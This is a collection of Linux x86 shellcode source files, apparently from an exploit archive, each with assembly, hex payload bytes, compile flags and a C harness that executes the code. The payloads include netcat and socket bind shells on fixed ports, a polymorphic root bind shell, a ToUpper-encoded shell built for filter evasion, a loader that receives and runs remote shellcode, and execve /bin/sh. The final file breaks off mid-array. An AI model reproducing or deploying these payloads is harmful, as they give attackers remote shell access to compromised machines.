1 | /* 2 | # Linux x86 /bin/nc -le /bin/sh -vp13337 shellcode(56bytes) 3 | # Author: Author: sajith 4 | # Tested on: i686 GNU/Linux 5 | # Shellcode Length: 56 6 | #SLAE - 750 7 | 8 | Disassembly of section .text: 9 | 10 | 08048060 <_start>: 11 | 8048060: 31 c0 xor eax,eax 12 | 8048062: 50 push eax 13 | 8048063: 68 33 33 33 37 push 0x37333333 14 | 8048068: 68 2d 76 70 31 push 0x3170762d 15 | 804806d: 89 e6 mov esi,esp 16 | 804806f: 50 push eax 17 | 8048070: 68 2f 2f 73 68 push 0x68732f2f 18 | 8048075: 68 2f 62 69 6e push 0x6e69622f 19 | 804807a: 68 2d 6c 65 2f push 0x2f656c2d 20 | 804807f: 89 e7 mov edi,esp 21 | 8048081: 50 push eax 22 | 8048082: 68 2f 2f 6e 63 push 0x636e2f2f 23 | 8048087: 68 2f 62 69 6e push 0x6e69622f 24 | 804808c: 89 e3 mov ebx,esp 25 | 804808e: 50 push eax 26 | 804808f: 56 push esi 27 | 8048090: 57 push edi 28 | 8048091: 53 push ebx 29 | 8048092: 89 e1 mov ecx,esp 30 | 8048094: b0 0b mov al,0xb 31 | 8048096: cd 80 int 0x80 32 | 33 | 34 | gcc -fno-stack-protector -z execstack shellcode.c -o shellcode 35 | */ 36 | 37 | #include 38 | #include 39 | 40 | unsigned char code[] = \ 41 | 42 | "\x31\xc0\x50\x68\x33\x33\x33\x37\x68\x2d\x76\x70\x31\x89\xe6\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x68\x2d\x6c\x65\x2f\x89\xe7\x50\x68\x2f\x2f\x6e\x63\x68\x2f\x62\x69\x6e\x89\xe3\x50\x56\x57\x53\x89\xe1\xb0\x0b\xcd\x80"; 43 | 44 | main() 45 | { 46 | 47 | printf("Shellcode Length: %d\n", strlen(code)); 48 | 49 | int (*ret)() = (int(*)())code; 50 | 51 | ret(); 52 | 53 | } -------------------------------------------------------------------------------- /Lin_x86/Linux_x86_-_Bind_Netcat___bin_nc___bin_sh_Shell__17771_TCP__Shellcode__58_bytes___Shellcode_exploit_for_Lin_x86_platform/shellcode.c: -------------------------------------------------------------------------------- 1 | /* 2 | # Linux x86 /bin/nc -le /bin/sh -vp 17771 shellcode 3 | # This shellcode will listen on port 17771 and give you /bin/sh 4 | # Shellcode Author: Oleg Boytsev 5 | # Tested on: Debian GNU/Linux 7/i686 6 | # Shellcode Length: 58 7 | # Command: gcc -m32 -z execstack x86_Linux_netcat_shellcode.c -o x86_Linux_netcat_shellcode 8 | 9 | global _start 10 | section .text 11 | _start: 12 | xor eax, eax 13 | xor edx, edx 14 | push eax 15 | push 0x31373737 ;-vp17771 16 | push 0x3170762d 17 | mov esi, esp 18 | 19 | push eax 20 | push 0x68732f2f ;-le//bin//sh 21 | push 0x6e69622f 22 | push 0x2f656c2d 23 | mov edi, esp 24 | 25 | push eax 26 | push 0x636e2f2f ;/bin//nc 27 | push 0x6e69622f 28 | mov ebx, esp 29 | 30 | push edx 31 | push esi 32 | push edi 33 | push ebx 34 | mov ecx, esp 35 | mov al,11 36 | int 0x80 37 | */ 38 | 39 | #include 40 | #include 41 | 42 | unsigned char shellcode[] = 43 | "\x31\xc0\x31\xd2\x50\x68\x37\x37\x37\x31\x68\x2d\x76\x70\x31\x89\xe6\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x68\x2d\x6c\x65\x2f\x89\xe7\x50\x68\x2f\x2f\x6e\x63\x68\x2f\x62\x69\x6e\x89\xe3\x52\x56\x57\x53\x89\xe1\xb0\x0b\xcd\x80"; 44 | 45 | main() 46 | { 47 | printf("Shellcode Length: %d\n",strlen(shellcode)); 48 | int (*ret)() = (int(*)())shellcode; 49 | ret(); 50 | } -------------------------------------------------------------------------------- /Lin_x86/Linux_x86_-_Bind_TCP_Listener__5555_TCP__+_Receive_Shellcode_+_Payload_Loader_Shellcode__83_bytes___Shellcode_exploit_for_Lin_x86_platform/shellcode.c: -------------------------------------------------------------------------------- 1 | /* 2 | _ __ __ ___ __ 3 | | |/ /__ ____ ____ / |/ /_ __/ /_____ _ 4 | | / _ \/ __ \/ __ \/ /|_/ / / / / __/ __ `/ 5 | / / __/ / / / /_/ / / / / /_/ / /_/ /_/ / 6 | /_/|_\___/_/ /_/\____/_/ /_/\__,_/\__/\__,_/ 7 | 8 | xenomuta\x40phreaker\x2enet 9 | http://xenomuta.tuxfamily.org/ - Methylxantina 256mg 10 | 11 | Description: 12 | linux/x86 listens for shellcode on tcp/5555 and jumps to it 13 | OS: Linux 14 | Arch: x86 15 | Length: 83 bytes 16 | Author: XenoMuta 17 | 18 | greetz to: 19 | str0k3 (tnx for your effort), emra (fragancia), 20 | fr1t0l4y (dejate ver), garay (no me olvido de los pobres ;p ) 21 | - God bless you all - 22 | */ 23 | .global _start 24 | 25 | _start: 26 | xor %ebx, %ebx 27 | mov %ebx, %eax 28 | 29 | _socket: 30 | push $0x6 31 | push $0x1 32 | push $0x2 33 | mov $0x66, %al 34 | incb %bl 35 | mov %esp, %ecx 36 | int $0x80 37 | 38 | _bind: 39 | mov %eax, %edi 40 | xor %edx, %edx 41 | push %edx 42 | pushw $0xb315 /* 5555 */ 43 | pushw %bx 44 | mov %esp, %ecx 45 | push $0x10 46 | push %ecx 47 | push %edi 48 | mov $0x66, %al 49 | incb %bl 50 | mov %esp, %ecx 51 | int $0x80 52 | 53 | _listen: 54 | incb %bl 55 | push $0x1 56 | push %edi 57 | mov $0x66, %al 58 | incb %bl 59 | mov %esp, %ecx 60 | int $0x80 61 | 62 | _accept: 63 | push %edx 64 | push %edx 65 | push %edi 66 | mov $0x66, %al 67 | incb %bl 68 | mov %esp, %ecx 69 | int $0x80 70 | mov %eax, %ebx 71 | 72 | _read: 73 | mov $0x3, %al 74 | mov %esp, %ecx 75 | mov $0x7ff, %dx 76 | incb %dl 77 | int $0x80 78 | jmp *%ecx /* Jump to our shellcode */ 79 | 80 | ; milw0rm.com [2009-09-09] -------------------------------------------------------------------------------- /Lin_x86/Linux_x86_-_Bind_TCP_Shell__31337_TCP__+_setreuid_0,0__Polymorphic_Shellcode__131_bytes___Shellcode_exploit_for_Lin_x86_platform/shellcode.c: -------------------------------------------------------------------------------- 1 | /* 2 | Title : Polymorphic shellcode that bindport to 31337 with setreuid (0,0) x86 linux shellcode. 3 | Name : 131 bytes bind port 31337 x86 linux polymorphic shellcode. 4 | Date : Sat Jun 17 21:27:03 2010 5 | Author : gunslinger_ 6 | Web : http://devilzc0de.org 7 | blog : http://gunslingerc0de.wordpress.com 8 | tested on : linux debian 9 | special thanks to : r0073r (inj3ct0r.com), d3hydr8 (darkc0de.com), ty miller (projectshellcode.com), jonathan salwan(shell-storm.org), mywisdom (devilzc0de.org), loneferret (offensive-security.com) 10 | greetzz to all devilzc0de, jasakom, yogyacarderlink, serverisdown, indonesianhacker and all my friend !! 11 | */ 12 | 13 | #include 14 | 15 | char bindport[] = "\xeb\x11\x5e\x31\xc9\xb1\x6b\x80\x6c\x0e\xff\x35\x80\xe9\x01" 16 | "\x75\xf6\xeb\x05\xe8\xea\xff\xff\xff\xe5\x7b\xbd\x0e\x02\xb5" 17 | "\x66\xf5\x66\x10\x66\x07\x85\x9f\x36\x9f\x37\xbe\x16\x33\xf8" 18 | "\xe5\x9b\x02\xb5\xbe\xfb\x87\x9d\xf0\x37\xaf\x9e\xbe\x16\x9f" 19 | "\x45\x86\x8b\xbe\x16\x33\xf8\xe5\x9b\x02\xb5\x87\x8b\xbe\x16" 20 | "\xe8\x39\xe5\x9b\x02\xb5\x87\x87\x8b\xbe\x16\x33\xf8\xe5\x9b" 21 | "\x02\xb5\xbe\xf8\x66\xfe\xe5\x74\x02\xb5\x76\xe5\x74\x02\xb5" 22 | "\x76\xe5\x74\x02\xb5\x87\x9d\x64\x64\xa8\x9d\x9d\x64\x97\x9e" 23 | "\xa3\xbe\x18\x87\x88\xbe\x16\xe5\x40\x02\xb5"; 24 | 25 | int main(void) 26 | { 27 | fprintf(stdout,"Length: %d\n",strlen(bindport)); 28 | (*(void(*)()) bindport)(); 29 | } -------------------------------------------------------------------------------- /Lin_x86/Linux_x86_-_Bind_TCP_Shell__5074_TCP__Shellcode__92_bytes___Shellcode_exploit_for_Lin_x86_platform/shellcode.c: -------------------------------------------------------------------------------- 1 | /* 2 | * s0t4ipv6@Shellcode.com.ar 3 | * x86 portbind a shell in port 5074 4 | * 92 bytes. 5 | * 6 | */ 7 | 8 | char shellcode[] = 9 | "\x31\xc0" // xorl %eax,%eax 10 | "\x50" // pushl %eax 11 | "\x40" // incl %eax 12 | "\x89\xc3" // movl %eax,%ebx 13 | "\x50" // pushl %eax 14 | "\x40" // incl %eax 15 | "\x50" // pushl %eax 16 | "\x89\xe1" // movl %esp,%ecx 17 | "\xb0\x66" // movb $0x66,%al 18 | "\xcd\x80" // int $0x80 19 | "\x31\xd2" // xorl %edx,%edx 20 | "\x52" // pushl %edx 21 | "\x66\x68\x13\xd2" // pushw $0xd213 22 | "\x43" // incl %ebx 23 | "\x66\x53" // pushw %bx 24 | "\x89\xe1" // movl %esp,%ecx 25 | "\x6a\x10" // pushl $0x10 26 | "\x51" // pushl %ecx 27 | "\x50" // pushl %eax 28 | "\x89\xe1" // movl %esp,%ecx 29 | "\xb0\x66" // movb $0x66,%al 30 | "\xcd\x80" // int $0x80 31 | "\x40" // incl %eax 32 | "\x89\x44\x24\x04" // movl %eax,0x4(%esp,1) 33 | "\x43" // incl %ebx 34 | "\x43" // incl %ebx 35 | "\xb0\x66" // movb $0x66,%al 36 | "\xcd\x80" // int $0x80 37 | "\x83\xc4\x0c" // addl $0xc,%esp 38 | "\x52" // pushl %edx 39 | "\x52" // pushl %edx 40 | "\x43" // incl %ebx 41 | "\xb0\x66" // movb $0x66,%al 42 | "\xcd\x80" // int $0x80 43 | "\x93" // xchgl %eax,%ebx 44 | "\x89\xd1" // movl %edx,%ecx 45 | "\xb0\x3f" // movb $0x3f,%al 46 | "\xcd\x80" // int $0x80 47 | "\x41" // incl %ecx 48 | "\x80\xf9\x03" // cmpb $0x3,%cl 49 | "\x75\xf6" // jnz 50 | "\x52" // pushl %edx 51 | "\x68\x6e\x2f\x73\x68" // pushl $0x68732f6e 52 | "\x68\x2f\x2f\x62\x69" // pushl $0x69622f2f 53 | "\x89\xe3" // movl %esp,%ebx 54 | "\x52" // pushl %edx 55 | "\x53" // pushl %ebx 56 | "\x89\xe1" // movl %esp,%ecx 57 | "\xb0\x0b" // movb $0xb,%al 58 | "\xcd\x80" // int $0x80 59 | ; 60 | 61 | main() { 62 | int *ret; 63 | ret=(int *)&ret +2; 64 | printf("Shellcode lenght=%d\n",strlen(shellcode)); 65 | (*ret) = (int)shellcode; 66 | } 67 | 68 | // milw0rm.com [2004-09-12] -------------------------------------------------------------------------------- /Lin_x86/Linux_x86_-_Bind_TCP_Shell__5074_TCP__ToUpper_Encoded_Shellcode__226_bytes___Shellcode_exploit_for_Lin_x86_platform/shellcode.c: -------------------------------------------------------------------------------- 1 | /* 2 | * Bindshell puerto 5074 (TOUPPER EVASION) 3 | * 226 bytes 4 | * Bindshell original: Matias Sedalo (92 bytes) 5 | * 6 | * La binshell esta codificada usando 2 bytes para 7 | * representar 1 byte original de la siguiente forma: 8 | * byte original: 0xAB 9 | * 0x41 + 0xA = 0x4B; 0x41 + 0xB = 0x4C 10 | * byte codificado: [0x4B 0x4C] 11 | * 12 | * by Tora 13 | */ 14 | 15 | #include 16 | #include 17 | 18 | char shellcode[] = 19 | /* _start */ 20 | "\xeb\x02" /* jmp short A */ 21 | 22 | /* A */ 23 | "\xeb\x05" /* jmp short C */ 24 | 25 | /* B */ 26 | "\xe8\xf9\xff\xff\xff" /* call A */ 27 | 28 | /* C */ 29 | "\x5f" /* pop edi */ 30 | "\x81\xef\xdf\xff\xff\xff" /* sub edi, 0xffffffdf */ 31 | "\x57" /* push edi */ 32 | "\x5e" /* pop esi */ 33 | "\x29\xc9" /* sub ecx, ecx */ 34 | "\x80\xc1\xb8" /* add cl, 0xb8 */ 35 | 36 | /* bucle */ 37 | "\x8a\x07" /* mov al, byte [edi] */ 38 | "\x2c\x41" /* sub al, 0x41 */ 39 | "\xc0\xe0\x04" /* shl al, 4 */ 40 | "\x47" /* inc edi */ 41 | "\x02\x07" /* add al, byte [edi] */ 42 | "\x2c\x41" /* sub al, 0x41 */ 43 | "\x88\x06" /* mov byte [esi], al */ 44 | "\x46" /* inc esi */ 45 | "\x47" /* inc edi */ 46 | "\x49" /* dec ecx */ 47 | "\xe2\xed" /* loop bucle */ 48 | /* Shellcode codificada de 184 (0xb8) bytes */ 49 | "DBMAFAEAIJMDFAEAFAIJOBLAGGMNIADBNCFCGGGIBDNCEDGGFDIJOBGKB" 50 | "AFBFAIJOBLAGGMNIAEAIJEECEAEEDEDLAGGMNIAIDMEAMFCFCEDLAGGMNIA" 51 | "JDIJNBLADPMNIAEBIAPJADHFPGFCGIGOCPHDGIGICPCPGCGJIJODFCFDIJO" 52 | "BLAALMNIA"; 53 | 54 | int main(void) 55 | { 56 | int *ret; 57 | char *t; 58 | 59 | for (t = shellcode; *t; t++) 60 | if (islower(*t)) 61 | *t = toupper(*t); 62 | 63 | ret=(int *)&ret +3; 64 | printf("Shellcode lenght=%d\n",strlen(shellcode)); 65 | (*ret) = (int)shellcode; 66 | } 67 | 68 | // milw0rm.com [2004-09-26] -------------------------------------------------------------------------------- /Lin_x86/Linux_x86_-_Bind_TCP__bin_sh_Shell__31337_TCP__Shellcode__80_bytes___Shellcode_exploit_for_Lin_x86_platform/shellcode.c: -------------------------------------------------------------------------------- 1 | /* 2 | * (linux/x86) bind '/bin/sh' to 31337/tcp - 80 bytes 3 | * - izik 4 | */ 5 | 6 | char shellcode[] = 7 | 8 | "\x6a\x66" // push $0x66 9 | "\x58" // pop %eax 10 | "\x99" // cltd 11 | "\x6a\x01" // push $0x1 12 | "\x5b" // pop %ebx 13 | "\x52" // push %edx 14 | "\x53" // push %ebx 15 | "\x6a\x02" // push $0x2 16 | 17 | // 18 | // <_doint>: 19 | // 20 | 21 | "\x89\xe1" // mov %esp,%ecx 22 | "\xcd\x80" // int $0x80 23 | 24 | "\x5b" // pop %ebx 25 | "\x5d" // pop %ebp 26 | "\x52" // push %edx 27 | "\x66\xbd\x69\x7a" // mov $0x7a69,%bp (0x7a69 = 31337) 28 | "\x0f\xcd" // bswap %ebp 29 | "\x09\xdd" // or %ebx,%ebp 30 | "\x55" // push %ebp 31 | "\x6a\x10" // push $0x10 32 | "\x51" // push %ecx 33 | "\x50" // push %eax 34 | "\x89\xe1" // mov %esp,%ecx 35 | "\xb0\x66" // mov $0x66,%al 36 | "\xcd\x80" // int $0x80 37 | "\xb3\x04" // mov $0x4,%bl 38 | "\xb0\x66" // mov $0x66,%al 39 | "\xcd\x80" // int $0x80 40 | "\x89\x64\x24\x08" // mov %esp,0x8(%esp) 41 | "\x43" // inc %ebx 42 | "\xb0\x66" // mov $0x66,%al 43 | "\xcd\x80" // int $0x80 44 | "\x93" // xchg %eax,%ebx 45 | "\x59" // pop %ecx 46 | 47 | // 48 | // <_dup2loop>: 49 | // 50 | 51 | "\xb0\x3f" // mov $0x3f,%al 52 | "\xcd\x80" // int $0x80 53 | "\x49" // dec %ecx 54 | "\x79\xf9" // jns <_dup2loop> 55 | 56 | "\xb0\x0b" // mov $0xb,%al 57 | "\x52" // push %edx 58 | "\x68\x2f\x2f\x73\x68" // push $0x68732f2f 59 | "\x68\x2f\x62\x69\x6e" // push $0x6e69622f 60 | "\x89\xe3" // mov %esp,%ebx 61 | "\x52" // push %edx 62 | "\x53" // push %ebx 63 | "\xeb\xbb"; // jmp <_doint> 64 | 65 | int main(int argc, char **argv) { 66 | int *ret; 67 | ret = (int *)&ret + 2; 68 | (*ret) = (int) shellcode; 69 | } 70 | 71 | // milw0rm.com [2006-01-21] -------------------------------------------------------------------------------- /Lin_x86/Linux_x86_-_Bind_TCP__bin_sh_Shell__64533_TCP__Shellcode__97_bytes___Shellcode_exploit_for_Lin_x86_platform/shellcode.c: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | 4 | /* 5 | 1 ############################################################### 1 6 | 0 I'm Magnefikko member from Inj3ct0r Team & Promhyl Studies Team 1 7 | 1 ############################################################### 0 8 | 0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1 9 | 10 | 11 | by Magnefikko 12 | 05.07.2010 13 | magnefikko@gmail.com 14 | Promhyl Studies :: http://promhyl.tk 15 | Subgroup: #PRekambr 16 | Name: 97 bytes bind sh@64533 17 | Platform: Linux x86 18 | 19 | sock = socket(PF_INET, SOCK_STREAM, 0); 20 | bind(sock, *[2, 64533, 0], 16); 21 | listen(sock, 5); 22 | nsock = accept(sock, 0, 0); 23 | dup2(nsock, 0); 24 | dup2(nsock, 1); 25 | execve("/bin/sh", 0, 0); // http://promhyl.tk/index.php?a=art&art=83 26 | 27 | gcc -Wl,-z,execstack filename.c 28 | 29 | shellcode: 30 | 31 | \x6a\x66\x6a\x01\x5b\x58\x99\x52\x6a\x01\x6a\x02\x89\xe1\xcd\x80\x89\xc6\x6a\x66\x58\x43\x52\x66\x68\xfc\x15\x66\x53\x89\xe1\x6a\x10\x51\x56\x89\xe1\xcd\x80\x6a\x66\x58\x43\x43\x6a\x05\x56\xcd\x80\x6a\x66\x58\x43\x52\x52\x56\x89\xe1\xcd\x80\x89\xc3\x6a\x3f\x58\x31\xc9\xcd\x80\x6a\x3f\x58\x41\xcd\x80\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x99\x50\xb0\x0b\x59\xcd\x80 32 | 33 | */ 34 | 35 | 36 | int main(){ 37 | char shell[] = 38 | "\x6a\x66\x6a\x01\x5b\x58\x99\x52\x6a\x01\x6a\x02\x89\xe1\xcd\x80\x89\xc6\x6a\x66\x58\x43\x52\x66\x68\xfc\x15\x66\x53\x89\xe1\x6a\x10\x51\x56\x89\xe1\xcd\x80\x6a\x66\x58\x43\x43\x6a\x05\x56\xcd\x80\x6a\x66\x58\x43\x52\x52\x56\x89\xe1\xcd\x80\x89\xc3\x6a\x3f\x58\x31\xc9\xcd\x80\x6a\x3f\x58\x41\xcd\x80\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x99\x50\xb0\x0b\x59\xcd\x80"; 39 | printf("by Magnefikko\nmagnefikko@gmail.com\npromhyl.tk\n\nstrlen(shell) 40 | = %d\n", strlen(shell)); 41 | (*(void (*)()) shell)(); 42 | } -------------------------------------------------------------------------------- /Lin_x86/Linux_x86_-_Bind_TCP__bin_sh_Shell__64713_TCP__Shellcode__86_bytes___Shellcode_exploit_for_Lin_x86_platform/shellcode.c: -------------------------------------------------------------------------------- 1 | /* 2 | * linux-x86-portbind.c - portbind shellcode 86 bytes for Linux/x86 3 | * Copyright (c) 2006 Gotfault Security 4 | * 5 | * portbind shellcode that bind()'s a shell on port 64713/tcp 6 | * 7 | */ 8 | 9 | char shellcode[] = 10 | 11 | /* socket(AF_INET, SOCK_STREAM, 0) */ 12 | 13 | "\x6a\x66" // push $0x66 14 | "\x58" // pop %eax 15 | "\x6a\x01" // push $0x1 16 | "\x5b" // pop %ebx 17 | "\x99" // cltd 18 | "\x52" // push %edx 19 | "\x53" // push %ebx 20 | "\x6a\x02" // push $0x2 21 | "\x89\xe1" // mov %esp,%ecx 22 | "\xcd\x80" // int $0x80 23 | 24 | /* bind(s, server, sizeof(server)) */ 25 | 26 | "\x52" // push %edx 27 | "\x66\x68\xfc\xc9" // pushw $0xc9fc // PORT = 64713 28 | "\x66\x6a\x02" // pushw $0x2 29 | "\x89\xe1" // mov $esp,%ecx 30 | "\x6a\x10" // push $0x10 31 | "\x51" // push %ecx 32 | "\x50" // push %eax 33 | "\x89\xe1" // mov %esp,%ecx 34 | "\x89\xc6" // mov %eax,%esi 35 | "\x43" // inc %ebx 36 | "\xb0\x66" // mov $0x66,%al 37 | "\xcd\x80" // int $0x80 38 | 39 | /* listen(s, anything) */ 40 | 41 | "\xb0\x66" // mov $0x66,%al 42 | "\xd1\xe3" // shl %ebx 43 | "\xcd\x80" // int $0x80 44 | 45 | /* accept(s, 0, 0) */ 46 | 47 | "\x52" // push %edx 48 | "\x56" // push %esi 49 | "\x89\xe1" // mov %esp,%ecx 50 | "\x43" // inc %ebx 51 | "\xb0\x66" // mov $0x66,%al 52 | "\xcd\x80" // int $0x80 53 | 54 | "\x93" // xchg %eax,%ebx 55 | 56 | /* dup2(c, 2) , dup2(c, 1) , dup2(c, 0) */ 57 | 58 | "\x6a\x02" // push $0x2 59 | "\x59" // pop %ecx 60 | 61 | "\xb0\x3f" // mov $0x3f,%al 62 | "\xcd\x80" // int $0x80 63 | "\x49" // dec %ecx 64 | "\x79\xf9" // jns dup_loop 65 | 66 | /* execve("/bin/sh", ["/bin/sh"], NULL) */ 67 | 68 | "\x6a\x0b" // push $0xb 69 | "\x58" // pop %eax 70 | "\x52" // push %edx 71 | "\x68\x2f\x2f\x73\x68" // push $0x68732f2f 72 | "\x68\x2f\x62\x69\x6e" // push $0x6e69622f 73 | "\x89\xe3" // mov %esp, %ebx 74 | "\x52" // push %edx 75 | "\x53" // push %ebx 76 | "\x89\xe1" // mov %esp, %ecx 77 | "\xcd\x80"; // int $0x80 78 | 79 | int main() { 80 | 81 | int (*f)() = (int(*)())shellcode; 82 | printf("Length: %u\n", strlen(shellcode)); 83 | f(); 84 | } 85 | 86 | // milw0rm.com [2006-04-06] -------------------------------------------------------------------------------- /Lin_x86/Linux_x86_-_Bind_TCP__bin_sh_Shell__8000_TCP__Shellcode__179_bytes___Shellcode_exploit_for_Lin_x86_platform/shellcode.c: -------------------------------------------------------------------------------- 1 | ; 2 | ; Title : Bind asm code Linux x86 - 179 bytes 3 | ; IP : 0.0.0.0 4 | ; Port : 8000 5 | ; 6 | ; 7 | ; Use : nc localhost 8000 8 | ; id 9 | ; uid=0(root) gid=0(root) groupes=0(root) 10 | ; 11 | ; 12 | ; Author : Jonathan Salwan 13 | ; Mail : submit AT shell-storm.org 14 | ; Web : http://www.shell-storm.org 15 | ; 16 | ; 17 | ; More shellcodes in => http://www.shell-storm.org/shellcode/ 18 | ; 19 | 20 | 21 | section .data 22 | name db '/bin/sh', 0 23 | section .text 24 | global _start 25 | 26 | _start: 27 | ;;;;;;;;;;;;;;;;;;;;Socket();;;;;;;;;;;;;;;;;;; 28 | push byte 0x0 29 | push byte 0x1 30 | push byte 0x2 31 | 32 | mov eax, 0x66 33 | mov ebx, 0x1 34 | mov ecx, esp 35 | int 0x80 36 | ;;;;;;;;;;;;;;;;;;;;Socket();;;;;;;;;;;;;;;;;;; 37 | 38 | mov edx, eax 39 | 40 | ;;;;;;;;;;;;;;;;;;;;Bind();;;;;;;;;;;;;;;;;;;;; 41 | push byte 0x0 42 | push byte 0x0 43 | push byte 0x0 44 | push word 0x401f 45 | push word 0x2 46 | mov ebx, esp 47 | 48 | push byte 0x10 49 | push ebx 50 | push edx 51 | 52 | mov eax, 0x66 53 | mov ebx, 0x2 54 | mov ecx, esp 55 | int 0x80 56 | ;;;;;;;;;;;;;;;;;;;;Bind();;;;;;;;;;;;;;;;;;;;; 57 | 58 | ;;;;;;;;;;;;;;;;;;;;Listen();;;;;;;;;;;;;;;;;;; 59 | push byte 0x1 60 | push edx 61 | 62 | mov eax, 0x66 63 | mov ebx, 0x4 64 | mov ecx, esp 65 | int 0x80 66 | ;;;;;;;;;;;;;;;;;;;;Listen();;;;;;;;;;;;;;;;;;; 67 | 68 | ;;;;;;;;;;;;;;;;;;;;Accept();;;;;;;;;;;;;;;;;;; 69 | push byte 0x0 70 | push byte 0x0 71 | push edx 72 | 73 | mov eax, 0x66 74 | mov ebx, 0x5 75 | mov ecx, esp 76 | int 0x80 77 | ;;;;;;;;;;;;;;;;;;;;Accept();;;;;;;;;;;;;;;;;;; 78 | 79 | mov edx, eax 80 | 81 | ;;;;;;;;;;;;;;;;;;;;Dup2();;;;;;;;;;;;;;;;;;;;; 82 | mov eax, 0x3f 83 | mov ebx, edx 84 | mov ebx, 0x2 85 | int 0x80 86 | 87 | mov eax, 0x3f 88 | mov ebx, edx 89 | mov ecx, 0x1 90 | int 0x80 91 | 92 | mov eax, 0x3f 93 | mov ebx, edx 94 | mov ecx, 0x0 95 | int 0x80 96 | ;;;;;;;;;;;;;;;;;;;;Dup2();;;;;;;;;;;;;;;;;;;;; 97 | 98 | ;;;;;;;;;;;;;;;;;;;;Execve();;;;;;;;;;;;;;;;;;; 99 | mov al, 0x0b 100 | mov ebx, name 101 | push byte 0x0 102 | push name 103 | mov ecx, esp 104 | mov edx, 0x0 105 | int 0x80 106 | ;;;;;;;;;;;;;;;;;;;;Execve();;;;;;;;;;;;;;;;;;; 107 | 108 | ; milw0rm.com [2009-06-01] -------------------------------------------------------------------------------- /Lin_x86/Linux_x86_-_Bind_TCP__bin_sh_Shell__Random_TCP_Port__Shellcode__44_bytes___Shellcode_exploit_for_Lin_x86_platform/shellcode.c: -------------------------------------------------------------------------------- 1 | /* 2 | # Super_Small_Bind_Shell 2 (x86) 3 | # Date: 17.03.2017 4 | # This shellcode will listen on random port and show you how deep the rabbit hole goes 5 | # Please note that ports below 1024 require high privileges to bind! 6 | # Shellcode Author: ALEH BOITSAU 7 | # Shellcode Length: 44 bytes!) 8 | # Tested on: Debian GNU/Linux 8/x86_64 9 | # Command: gcc -m32 -z execstack super_small_bind_shell2.c -o super_small_bind_shell2 10 | 11 | section .text 12 | global _start 13 | _start: 14 | 15 | xor edx, edx 16 | push edx 17 | push 0x68732f2f ;-le//bin//sh 18 | push 0x6e69622f 19 | push 0x2f656c2d 20 | mov edi, esp 21 | 22 | push edx 23 | push 0x636e2f2f ;/bin//nc 24 | push 0x6e69622f 25 | mov ebx, esp 26 | 27 | push edx 28 | push edi 29 | push ebx 30 | mov ecx, esp 31 | xor eax, eax 32 | mov al,11 33 | int 0x80 34 | 35 | */ 36 | 37 | #include 38 | #include 39 | 40 | unsigned char shellcode[] = 41 | "\x31\xd2\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x68\x2d\x6c\x65\x2f\x89\xe7\x52\x68\x2f\x2f\x6e\x63\x68\x2f\x62\x69\x6e\x89\xe3\x52\x57\x53\x89\xe1\x31\xc0\xb0\x0b\xcd\x80"; 42 | main() 43 | { 44 | printf("Shellcode Length: %d\n",strlen(shellcode)); 45 | int (*ret)() = (int(*)())shellcode; 46 | ret(); 47 | } -------------------------------------------------------------------------------- /Lin_x86/Linux_x86_-_execve__bin_sh_Shellcode__24_bytes___Shellcode_exploit_for_Lin_x86_platform/shellcode.c: -------------------------------------------------------------------------------- 1 | /* 2 | ;Title: Linux/x86 - /bin/sh Shellcode 3 | ;Author: Touhid M.Shaikh 4 | ;Contact: https://github.com/touhidshaikh 5 | ;Category: Shellcode 6 | ;Architecture: Linux x86 7 | ;Description: This shellcode baased on stack method to Execute "/bin//sh". 8 | Length of shellcode is 24 bytes. 9 | ;Tested on : 3.2.0-23-generic-pae #36-Ubuntu SMP Tue Apr 10 22:19:09 10 | 11 | 12 | 13 | ===COMPILATION AND EXECUTION=== 14 | 15 | #nasm -f elf32 shell.asm -o shell.o <=== Making Object File 16 | 17 | #ld -m elf_i386 shell.o -o shell <=== Making Binary File 18 | 19 | #./bin2shell.sh shell <== xtract hex code from the binary( 20 | https://github.com/touhidshaikh/bin2shell) 21 | 22 | 23 | 24 | =================SHELLCODE(INTEL FORMAT)================= 25 | 26 | section .text 27 | global _start 28 | _start: 29 | xor eax,eax 30 | cdq 31 | push eax 32 | push 0x68732f2f 33 | push 0x6e69622f 34 | mov ebx,esp 35 | push eax 36 | push ebx 37 | mov ecx, esp 38 | mov al,0x0b 39 | int 80h 40 | 41 | ===================END HERE============================ 42 | 43 | Compile with gcc with some options. 44 | 45 | # gcc -fno-stack-protector -z execstack shell-testing.c -o shell-testing 46 | 47 | */ 48 | 49 | #include 50 | #include 51 | 52 | 53 | unsigned char code[] = \ 54 | "\x31\xc0\x99\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80"; 55 | 56 | main() 57 | { 58 | 59 | printf("Shellcode Length: %d\n", (int)strlen(code)); 60 | 61 | int (*ret)() = (int(*)())code; 62 | 63 | ret(); 64 | 65 | } -------------------------------------------------------------------------------- /Lin_x86/Linux_x86__Intel_x86_CPUID__-_execve__bin_sh_XORED_Encoded_Shellcode__41_bytes___Shellcode_exploit_for_Lin_x86_platform/shellcode.c: -------------------------------------------------------------------------------- 1 | /* 2 | * (linux/x86) execve("/bin/sh", ["/bin/sh"], NULL) / xor'ed against Intel x86 CPUID - 41 bytes 3 | * 4 | * The idea behind this shellcode is to use a *weak* pre-shared secret between the attacker and 5 | * the attacked machine. So if a 3rd party side would try to run this shellcode and would produce 6 | * a different CPUID output (e.g. different arch) the shellcode won't work. In addition this also 7 | * prevents from having the '/bin/sh' string visible on the wire. 8 | * 9 | * The shellcode key is (0x6c65746e, 'letn') and expected to be in %ecx register after CPUID 10 | * 11 | * - izik 12 | */ 13 | 14 | char shellcode[] = 15 | 16 | "\x31\xc0" // xor %eax,%eax 17 | "\x0f\xa2" // cpuid 18 | "\x51" // push %ecx 19 | "\x68\xe7\x95\xa8\xec" // push $0xeca895e7 20 | "\x68\xde\x7f\x37\x3f" // push $0x3f377fde 21 | "\x68\x07\x1a\xec\x8f" // push $0x8fec1a07 22 | 